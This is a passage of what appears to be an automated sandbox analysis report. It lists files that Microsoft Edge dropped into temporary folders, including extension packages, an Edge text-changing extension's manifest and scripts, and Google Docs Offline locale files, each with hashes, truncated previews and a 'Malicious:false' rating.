                                                                                                                                                                                                                                                                          SHA-512:5AB53D5E9C74581E7FBCF5E7291D3FB7C8844C119FD12DAC2D25C94A534ED3048C2FBB4B6B4B167B98FEDCE9B9A1B2B2D80E3E279EEA5A792FFD865FEDE616AA
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...H..W.................. ..p&.....W..........@..............................0.......&...`... ..............................................P0.......0.8.....%..t............0............................. .%.(...................hQ0..............................text..... ....... .................`..`.data......... ....... .............@....rdata........!.......!.............@..@.pdata...t....%..v....%.............@..@.xdata...W...@&..X....&.............@..@.bss..........&..........................idata.......P0......b&.............@....CRT....0....`0......h&.............@....tls.........p0......j&.............@....rsrc...8.....0......l&.............@..@.reloc........0......n&.............@..Bsfdel.... ....0......t&.............@...................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_522221543\6fda22f5-234c-47ea-9c4c-4598ca4f1074.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):11185
                                                                                                                                                                                                                                                                          Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                          MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                          SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                          SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                          SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_522221543\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1753
                                                                                                                                                                                                                                                                          Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                          MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                          SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                          SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                          SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_522221543\CRX_INSTALL\content.js

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):9815
                                                                                                                                                                                                                                                                          Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                          MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                          SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                          SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                          SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_522221543\CRX_INSTALL\content_new.js

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):10388
                                                                                                                                                                                                                                                                          Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                          MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                          SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                          SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                          SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_522221543\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):962
                                                                                                                                                                                                                                                                          Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                          MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                          SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                          SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                          SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\5e8895f8-43aa-480b-9076-a776b34016d0.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):154477
                                                                                                                                                                                                                                                                          Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                          MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                          SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                          SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                          SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\128.png

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):4982
                                                                                                                                                                                                                                                                          Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                          MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                          SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                          SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                          SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):908
                                                                                                                                                                                                                                                                          Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                          MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                          SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                          SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                          SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1285
                                                                                                                                                                                                                                                                          Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                          MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                          SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                          SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                          SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1244
                                                                                                                                                                                                                                                                          Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                          MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                          SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                          SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                          SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):977
                                                                                                                                                                                                                                                                          Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                          MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                          SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                          SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                          SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2616_973257036\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):3107
                                                                                                                                                                                                                                                                          Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                          MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                          SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                          SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                          SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                          Malicious:false
